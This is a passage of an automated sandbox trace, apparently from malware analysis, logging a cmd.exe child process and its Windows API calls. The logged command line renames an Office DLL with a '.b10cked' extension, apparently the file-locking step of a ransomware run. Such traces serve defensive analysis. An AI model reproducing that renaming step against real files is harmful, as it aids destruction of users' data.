GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0162.506] SetThreadUILanguage (LangId=0x0) returned 0x409 [0162.506] exit (_Code=0) Process: id = "277" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ac0" os_pid = "0xfbc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLIC~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22321 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22322 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22323 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22324 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 22325 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22326 start_va = 0x77230000 end_va = 0x7736bfff 
entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22327 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22328 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22329 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 22330 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22397 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22398 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22399 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22400 start_va = 0x320000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 22401 start_va = 0x580000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 22402 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22403 start_va = 0x75540000 end_va = 0x75589fff entry_point 
= 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22404 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22405 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22406 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22407 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22408 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22409 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22410 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22411 start_va = 0x200000 end_va = 0x2c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 22412 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = 
"\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22413 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22414 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 22415 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 22416 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 22417 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 22418 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 22419 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 22420 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 341 os_tid = 0x86c [0162.395] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fd5c | out: lpSystemTimeAsFileTime=0x18fd5c*(dwLowDateTime=0x9a2c0d80, dwHighDateTime=0x1d440a9)) [0162.395] GetCurrentProcessId () returned 0xfbc [0162.395] GetCurrentThreadId () returned 0x86c [0162.395] GetTickCount () returned 0x3139f [0162.395] QueryPerformanceCounter (in: lpPerformanceCount=0x18fd54 | out: lpPerformanceCount=0x18fd54*=21918435085) returned 1 [0162.396] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0162.396] __set_app_type (_Type=0x1) [0162.396] __p__fmode () returned 0x76b331f4 
[0162.396] __p__commode () returned 0x76b331fc [0162.396] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0162.396] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0162.396] GetCurrentThreadId () returned 0x86c [0162.396] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x86c) returned 0x38 [0162.397] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0162.397] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0162.397] SetThreadUILanguage (LangId=0x0) returned 0x409 [0162.397] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0162.397] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fcec | out: phkResult=0x18fcec*=0x0) returned 0x2 [0162.397] VirtualQuery (in: lpAddress=0x18fd23, lpBuffer=0x18fcbc, dwLength=0x1c | out: lpBuffer=0x18fcbc*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.397] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fcbc, dwLength=0x1c | out: lpBuffer=0x18fcbc*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0162.397] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fcbc, dwLength=0x1c | out: lpBuffer=0x18fcbc*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0162.397] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fcbc, dwLength=0x1c | out: lpBuffer=0x18fcbc*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, 
State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0162.397] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fcbc, dwLength=0x1c | out: lpBuffer=0x18fcbc*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0162.397] GetConsoleOutputCP () returned 0x1b5 [0162.397] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0162.397] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0162.397] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.397] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0162.398] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.398] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0162.398] _get_osfhandle (_FileHandle=1) returned 0x7 [0162.398] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0162.398] _get_osfhandle (_FileHandle=0) returned 0x3 [0162.398] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0162.398] _get_osfhandle (_FileHandle=0) returned 0x3 [0162.398] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0162.398] GetEnvironmentStringsW () returned 0x330210* [0162.399] FreeEnvironmentStringsW (penv=0x330210) returned 1 [0162.399] GetEnvironmentStringsW () returned 0x330210* [0162.399] FreeEnvironmentStringsW (penv=0x330210) returned 1 [0162.399] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ec5c | out: phkResult=0x18ec5c*=0x40) returned 0x0 [0162.399] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ec64, lpData=0x18ec68, lpcbData=0x18ec60*=0x1000 | out: lpType=0x18ec64*=0x0, lpData=0x18ec68*=0xa0, lpcbData=0x18ec60*=0x1000) returned 0x2 [0162.399] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", 
lpReserved=0x0, lpType=0x18ec64, lpData=0x18ec68, lpcbData=0x18ec60*=0x1000 | out: lpType=0x18ec64*=0x4, lpData=0x18ec68*=0x1, lpcbData=0x18ec60*=0x4) returned 0x0 [0162.399] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ec64, lpData=0x18ec68, lpcbData=0x18ec60*=0x1000 | out: lpType=0x18ec64*=0x0, lpData=0x18ec68*=0x1, lpcbData=0x18ec60*=0x1000) returned 0x2 [0162.399] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ec64, lpData=0x18ec68, lpcbData=0x18ec60*=0x1000 | out: lpType=0x18ec64*=0x4, lpData=0x18ec68*=0x0, lpcbData=0x18ec60*=0x4) returned 0x0 [0162.399] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ec64, lpData=0x18ec68, lpcbData=0x18ec60*=0x1000 | out: lpType=0x18ec64*=0x4, lpData=0x18ec68*=0x40, lpcbData=0x18ec60*=0x4) returned 0x0 [0162.399] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ec64, lpData=0x18ec68, lpcbData=0x18ec60*=0x1000 | out: lpType=0x18ec64*=0x4, lpData=0x18ec68*=0x40, lpcbData=0x18ec60*=0x4) returned 0x0 [0162.399] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ec64, lpData=0x18ec68, lpcbData=0x18ec60*=0x1000 | out: lpType=0x18ec64*=0x0, lpData=0x18ec68*=0x40, lpcbData=0x18ec60*=0x1000) returned 0x2 [0162.399] RegCloseKey (hKey=0x40) returned 0x0 [0162.399] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ec5c | out: phkResult=0x18ec5c*=0x40) returned 0x0 [0162.399] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ec64, lpData=0x18ec68, lpcbData=0x18ec60*=0x1000 | out: lpType=0x18ec64*=0x0, lpData=0x18ec68*=0x40, lpcbData=0x18ec60*=0x1000) returned 0x2 [0162.400] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ec64, lpData=0x18ec68, 
lpcbData=0x18ec60*=0x1000 | out: lpType=0x18ec64*=0x4, lpData=0x18ec68*=0x1, lpcbData=0x18ec60*=0x4) returned 0x0 [0162.400] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ec64, lpData=0x18ec68, lpcbData=0x18ec60*=0x1000 | out: lpType=0x18ec64*=0x0, lpData=0x18ec68*=0x1, lpcbData=0x18ec60*=0x1000) returned 0x2 [0162.400] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ec64, lpData=0x18ec68, lpcbData=0x18ec60*=0x1000 | out: lpType=0x18ec64*=0x4, lpData=0x18ec68*=0x0, lpcbData=0x18ec60*=0x4) returned 0x0 [0162.400] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ec64, lpData=0x18ec68, lpcbData=0x18ec60*=0x1000 | out: lpType=0x18ec64*=0x4, lpData=0x18ec68*=0x9, lpcbData=0x18ec60*=0x4) returned 0x0 [0162.400] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ec64, lpData=0x18ec68, lpcbData=0x18ec60*=0x1000 | out: lpType=0x18ec64*=0x4, lpData=0x18ec68*=0x9, lpcbData=0x18ec60*=0x4) returned 0x0 [0162.400] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ec64, lpData=0x18ec68, lpcbData=0x18ec60*=0x1000 | out: lpType=0x18ec64*=0x0, lpData=0x18ec68*=0x9, lpcbData=0x18ec60*=0x1000) returned 0x2 [0162.400] RegCloseKey (hKey=0x40) returned 0x0 [0162.400] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886384 [0162.400] srand (_Seed=0x5b886384) [0162.400] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLIC~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll.b10cked\"" [0162.400] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLIC~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLSLICER.DLL.trx_dll.b10cked\"" [0162.400] GetCurrentDirectoryW (in: 
nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.400] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x331970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0162.401] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0162.401] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0162.401] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0162.401] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0162.401] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0162.401] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0162.401] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0162.401] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0162.401] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0162.401] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0162.401] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0162.401] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0162.402] GetEnvironmentStringsW () returned 0x332360* [0162.402] FreeEnvironmentStringsW (penv=0x332360) returned 1 [0162.402] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.402] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0162.402] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0162.402] _wcsicmp (_String1="KEYS", 
_String2="ERRORLEVEL") returned 6 [0162.402] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0162.402] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0162.402] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0162.402] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0162.402] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0162.402] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0162.402] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18fa28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.402] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x18fa28, lpFilePart=0x18fa24 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18fa24*="Desktop") returned 0x18 [0162.402] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0162.403] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f7a4 | out: lpFindFileData=0x18f7a4) returned 0x3309f0 [0162.403] FindClose (in: hFindFile=0x3309f0 | out: hFindFile=0x3309f0) returned 1 [0162.403] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f7a4 | out: lpFindFileData=0x18f7a4) returned 0x3309f0 [0162.403] FindClose (in: hFindFile=0x3309f0 | out: hFindFile=0x3309f0) returned 1 [0162.403] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f7a4 | out: lpFindFileData=0x18f7a4) returned 0x3309f0 [0162.403] FindClose (in: hFindFile=0x3309f0 | out: hFindFile=0x3309f0) returned 1 [0162.403] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0162.403] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0162.403] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0162.403] 
GetEnvironmentStringsW () returned 0x330210* [0162.404] FreeEnvironmentStringsW (penv=0x330210) returned 1 [0162.404] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0162.404] GetConsoleOutputCP () returned 0x1b5 [0162.404] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0162.404] GetUserDefaultLCID () returned 0x409 [0162.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0162.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fb68, cchData=128 | out: lpLCData="0") returned 2 [0162.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fb68, cchData=128 | out: lpLCData="0") returned 2 [0162.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fb68, cchData=128 | out: lpLCData="1") returned 2 [0162.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0162.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0162.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0162.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0162.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0162.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0162.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0162.405] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0162.405] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, 
cchData=8 | out: lpLCData=".") returned 2 [0162.406] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0162.406] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0162.407] GetConsoleTitleW (in: lpConsoleTitle=0x320930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.510] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0162.510] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0162.510] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0162.510] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0162.511] _wcsicmp (_String1="move", _String2=")") returned 68 [0162.511] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0162.511] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0162.511] _wcsicmp (_String1="IF", _String2="move") returned -4 [0162.511] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0162.511] _wcsicmp (_String1="REM", _String2="move") returned 5 [0162.511] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0162.515] GetConsoleTitleW (in: lpConsoleTitle=0x18f860, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0162.516] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0162.516] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0162.516] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0162.516] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0162.516] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0162.516] _wcsicmp (_String1="move", _String2="CD") returned 10 [0162.516] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0162.516] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0162.516] _wcsicmp (_String1="move", _String2="REN") returned -5 [0162.516] _wcsicmp 
(_String1="move", _String2="ECHO") returned 8 [0162.516] _wcsicmp (_String1="move", _String2="SET") returned -6 [0162.516] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0162.516] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0162.516] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0162.516] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0162.516] _wcsicmp (_String1="move", _String2="MD") returned 11 [0162.516] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0162.516] _wcsicmp (_String1="move", _String2="RD") returned -5 [0162.516] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0162.516] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0162.516] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0162.516] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0162.516] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0162.516] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0162.516] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0162.516] _wcsicmp (_String1="move", _String2="VER") returned -9 [0162.516] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0162.516] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0162.516] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0162.516] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0162.517] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0162.517] _wcsicmp (_String1="move", _String2="START") returned -6 [0162.517] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0162.517] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0162.517] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0162.518] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0162.518] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0162.518] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x18f61c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x18f614, 
